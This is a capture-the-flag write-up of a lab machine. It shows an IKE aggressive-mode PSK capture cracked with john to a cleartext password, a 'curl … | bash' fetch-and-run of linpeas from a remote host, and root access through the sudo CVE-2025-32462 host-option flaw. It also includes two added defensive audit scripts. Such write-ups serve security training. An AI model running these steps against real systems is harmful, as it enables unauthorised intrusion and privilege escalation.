Reconnaissance

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne

Since the nmap scan of all TCP ports only found port 22, which is likely not vulnerable, I rescan for UDP instead. This finds port 500, the port commonly associated with IKE (ISAKMP).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0

Initial Access

Running ike-scan in aggressive mode with --pskcrack=ike.psk will dump the pre-shared key (PSK) parameters to ike.psk. Additionally, the scan identifies a possible user account and a domain name in the returned ID payload, ike@expressway.htb. I then run ikescan2john to convert the PSK parameters into a crackable hash.

$ ike-scan --pskcrack=ike.psk -A 10.129.19.36
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.19.36    Aggressive Mode Handshake returned HDR=(CKY-R=ed7cd7e6fb28f99c) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
 
Ending ike-scan 1.9.6: 1 hosts scanned in 0.033 seconds (30.51 hosts/sec).  1 returned handshake; 0 returned notify
 
$ cat ike.psk
034fbf932c24233ce73a9bdad<SNIP>
 
$ ikescan2john ike.psk > hash

Feeding the generated hash into john returns the cleartext password freakingrockstarontheroad, which allows me to log in via SSH as ike.

$ john hash --wordlist=/usr/share/wordlists/rockyou.txt --fork=10
Using default input encoding: UTF-8
Loaded 1 password hash (IKE, PSK [HMAC MD5/SHA1 32/64])
Cost 1 (hash algorithm used for hmac [1:MD5 2:SHA1]) is 2 for all loaded hashes
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
freakingrockstarontheroad (?)

Privilege Escalation

The user ike does not seem to be able to run any command via sudo, but is a member of the unusual group proxy. Searching for files owned by this group returns a few logs from Squid. Overall they don't seem very interesting, but there is an additional hostname, offramp.expressway.htb, in the access logs.

$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
 
$ find / -group proxy 2>/dev/null
/run/squid
/var/spool/squid
/var/spool/squid/netdb.state
/var/log/squid
/var/log/squid/cache.log.2.gz
/var/log/squid/access.log.2.gz
/var/log/squid/cache.log.1
/var/log/squid/access.log.1
 
$ cat /var/log/squid/access.log.1
--- SNIP ---
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
--- SNIP ---
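As an added analysis helper (not part of the original write-up), the script below parses Squid's native access.log format shown above and lists every destination host together with the Squid result codes it was logged with, which is the manual grep for extra hostnames automated. The sample log is constructed from the four lines above plus one CONNECT entry, since CONNECT requests log host:port without a scheme and need separate handling.

```python
from __future__ import annotations
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Field order of Squid's native access.log format, as in the excerpt above.
FIELDS = ("ts", "elapsed_ms", "client", "result", "bytes", "method", "url",
          "ident", "hierarchy", "mime")

def request_host(method: str, url: str) -> str | None:
    """Host a request was aimed at. CONNECT logs 'host:port' with no scheme;
    Squid's 'error:...' pseudo-URLs and bare paths such as '/' have no host."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0] or None
    parts = urlsplit(url)
    return parts.hostname if parts.scheme in ("http", "https", "ftp") else None

def parse_squid_line(line: str) -> dict | None:
    """Split one native-format line into a dict, or None if it is malformed."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["code"], _, status = rec["result"].partition("/")
    rec["status"] = int(status)
    rec["host"] = request_host(rec["method"], rec["url"])
    return rec

def hosts_seen(lines) -> dict[str, Counter]:
    """Every hostname in the log mapped to a Counter of Squid result codes,
    e.g. {'offramp.expressway.htb': Counter({'TCP_DENIED/403': 1})}."""
    seen: dict[str, Counter] = defaultdict(Counter)
    for line in lines:
        rec = parse_squid_line(line)
        if rec and rec["host"]:
            seen[rec["host"]][rec["result"]] += 1
    return dict(seen)

# Constructed sample: the four lines from the excerpt plus one CONNECT entry.
SAMPLE_LOG = """\
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html
1753229700.000     12 192.168.68.50 TCP_TUNNEL/200 5120 CONNECT offramp.expressway.htb:443 - HIER_DIRECT/10.0.0.5 -
""".splitlines()

if __name__ == "__main__":
    for host, codes in sorted(hosts_seen(SAMPLE_LOG).items()):
        print(host, dict(codes))
```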

Running linpeas.sh shows two sudo binaries on the host, at /usr/local/bin/sudo and /usr/bin/sudo. Based on the PATH variable of the user ike, the one in /usr/local/bin takes precedence.

$ curl http://10.10.10.10/linpeas.sh | bash
--- SNIP ---
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 1.5M Aug 14 12:58 /usr/sbin/exim4
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 116K Aug 26 22:05 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 75K Sep  9 10:09 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K Aug 26 22:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 91K Sep  9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root 276K Jun 27  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
--- SNIP ---

$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

They return different versions when invoked with -V, and looking up vulnerabilities in 1.9.17 finds several, among them CVE-2025-32462 and CVE-2025-32463.

$ /usr/local/bin/sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
 
$ /usr/bin/sudo -V
Sudo version 1.9.13p3
Sudoers policy plugin version 1.9.13p3
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.13p3
Sudoers audit plugin version 1.9.13p3
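As an added audit script (not from the write-up), the code below walks PATH for every sudo binary in lookup order, parses the output of sudo -V, and reports which of the two CVEs named above the version falls into. The affected ranges are an assumption taken from the upstream sudo advisories as I recall them (1.8.8 up to 1.9.17 for CVE-2025-32462, 1.9.14 up to 1.9.17 for CVE-2025-32463, both fixed in 1.9.17p1) and should be confirmed against the advisory.

```python
from __future__ import annotations
import os, re, subprocess
# Affected ranges [low, fixed) per CVE. Assumption: taken from the upstream sudo
# advisories as I recall them; confirm against the advisory before relying on it.
FIXED = "1.9.17p1"
AFFECTED = {
    "CVE-2025-32462": ("1.8.8", FIXED),   # -h host honoured outside -l
    "CVE-2025-32463": ("1.9.14", FIXED),  # chroot (-R) handling
}

def version_tuple(v: str) -> tuple[int, ...]:
    """'1.9.13p3' -> (1, 9, 13, 3); missing patch level is 0 so 1.9.17 < 1.9.17p1."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", v)
    if not m:
        raise ValueError(f"unrecognised sudo version {v!r}")
    return tuple(int(x or 0) for x in m.groups())

def parse_sudo_version(output: str) -> str | None:
    """Pull the version out of 'sudo -V' output ('Sudo version 1.9.17')."""
    m = re.search(r"^Sudo version (\S+)", output, re.M)
    return m.group(1) if m else None

def affected_cves(version: str) -> list[str]:
    v = version_tuple(version)
    return [cve for cve, (low, fixed) in AFFECTED.items()
            if version_tuple(low) <= v < version_tuple(fixed)]

def sudo_candidates(path_env: str) -> list[str]:
    """Every executable named sudo on PATH, in lookup order: the first entry is
    what a bare 'sudo' resolves to, which is why /usr/local/bin/sudo won above."""
    found = []
    for d in path_env.split(os.pathsep):
        p = os.path.join(d, "sudo")
        if d and os.path.isfile(p) and os.access(p, os.X_OK):
            found.append(p)
    return found

def audit(path_env: str | None = None) -> list[tuple[str, str, list[str]]]:
    """(binary, version, affected CVEs) per sudo on PATH; 'sudo -V' needs no privileges."""
    report = []
    for binary in sudo_candidates(path_env or os.environ.get("PATH", "")):
        out = subprocess.run([binary, "-V"], capture_output=True, text=True).stdout
        ver = parse_sudo_version(out)
        report.append((binary, ver or "unknown", affected_cves(ver) if ver else []))
    return report

if __name__ == "__main__":
    for binary, ver, cves in audit():
        print(binary, ver, ", ".join(cves) if cves else "not in an affected range")
```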

Based on its description, CVE-2025-32462 sounds promising. sudo has a -h switch to specify a hostname, which is meant to be used together with --list to print the commands the user could run on that specific host. When the --list switch is omitted, sudo will instead run the command on the current host if the user has the needed privileges on the host provided with -h.

Since I already found another hostname in the Squid proxy logs, I try my luck and see that ike can run anything as root on offramp. Replacing -l with -s then gives me a shell as root to read the final flag.

$ sudo -h offramp.expressway.htb -l
Matching Defaults entries for ike on offramp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
 
User ike may run the following commands on offramp:
    (root) NOPASSWD: ALL
 
$ sudo -h offramp.expressway.htb -s
root@expressway:/home/ike# whoami
root

It is also possible to use CVE-2025-32463 to escalate privileges on the host; proofs of concept are available on GitHub.

Attack Path

flowchart TD

subgraph "Initial Access"
    A(IKE) -->|Aggressive Scan| B(Pre-Shared Key)
    B -->|Brute Force| C(Shell as ike)
end

subgraph "Privilege Escalation"
    C -->|Read Squid proxy logs| D(Find domain offramp)
    D -->|CVE-2025-32462| E(Shell as root)
end